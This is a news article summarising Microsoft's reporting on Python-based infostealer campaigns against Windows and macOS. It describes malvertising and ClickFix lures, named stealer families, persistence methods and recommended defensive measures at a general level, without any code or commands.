Cybercriminals Use Python to Attack Windows and Mac Simultaneously

Cybercriminals are expanding their operations to target users of macOS, Apple’s operating system, in addition to Windows. By using the multipurpose programming language Python, these attacks become more efficient and far-reaching.

Microsoft notes that the use of Python allows attackers to "reuse code and reach heterogeneous environments with minimal overhead," saving time and maximizing the impact of attacks.

Python, by its nature, enables criminals to develop malware that operates across various operating systems with minimal modifications. Thus, a malicious program can be quickly adapted for both Windows and macOS.

This shift in the attack landscape is significant, as macOS historically had a perception of superior security, leading many users to a false sense of protection.

ClickFix Transformed the Scenario

The most common entry point for these attacks is the technique of malvertising, where malicious ads are displayed on search platforms like Google Ads. These ads disguise themselves as legitimate and target users seeking popular applications.

When a victim clicks on an apparently legitimate ad, they are redirected to a fake site that mimics the original. On these sites, instructions are offered that promise to resolve technical problems or provide software downloads.

The ClickFix technique is used, including commands that prompt the victim to copy and paste instructions into the Terminal of macOS. The Terminal is an interface that allows the execution of commands directly on the system, potentially granting elevated permissions to the malware.

Data Extraction as the Main Objective

Malicious files are often installers in DMG format, specific to macOS, similar to the executable .exe files of Windows. This malware is designed to steal information from the victim.

Among the known variants of malware are Atomic macOS Stealer, MacSync, and DigitStealer, all with the common goal of extracting valuable data.

These attacks stand out for their sophistication, utilizing legitimate features of macOS to operate without writing files to the hard drive, complicating detection. Criminals exploit native utilities and the automation language AppleScript, making identification by antivirus programs challenging.

The malware searches for browser credentials, such as saved passwords, as well as information from the iCloud Keychain, which centralizes stored credentials.

Malware Persistence on the System

Once installed, the malware aims to ensure its presence on the system. In macOS, this can be done by modifying property lists (plists) or by creating launch agents, functioning similarly to Windows registry keys.

The communication between the malware and the criminals occurs through disguised channels, such as the messaging app Telegram, used for remote control and sending stolen data.

WhatsApp as a Distribution Vector

Microsoft warns about campaigns that use WhatsApp to disseminate malware, such as the Eternal Stealer, where messages from known contacts or groups contain links that install the malware.

This method is effective, as trust in WhatsApp messages reduces the user's suspicion. Another vector involves fake PDF editors that, through poisoned SEO, appear in searches like "free PDF editor".

By installing these tools, the victim activates an infostealer that collects data from the installed browsers.

Consequences for Users and Businesses

The impacts of the attacks extend beyond password theft. Access to corporate credentials poses risks to the security of sensitive information and access to business systems, potentially resulting in financial fraud and ransomware attacks.

Protection Measures

Microsoft recommends several security practices to minimize risks:

• Education on how malicious ads work and distrust towards suspicious messages and downloads;
• Monitoring activities in the Terminal, which can signal compromise;
• Tracking access to the iCloud Keychain, avoiding unauthorized access;
• Analyzing network traffic for suspicious requests indicating data exfiltration.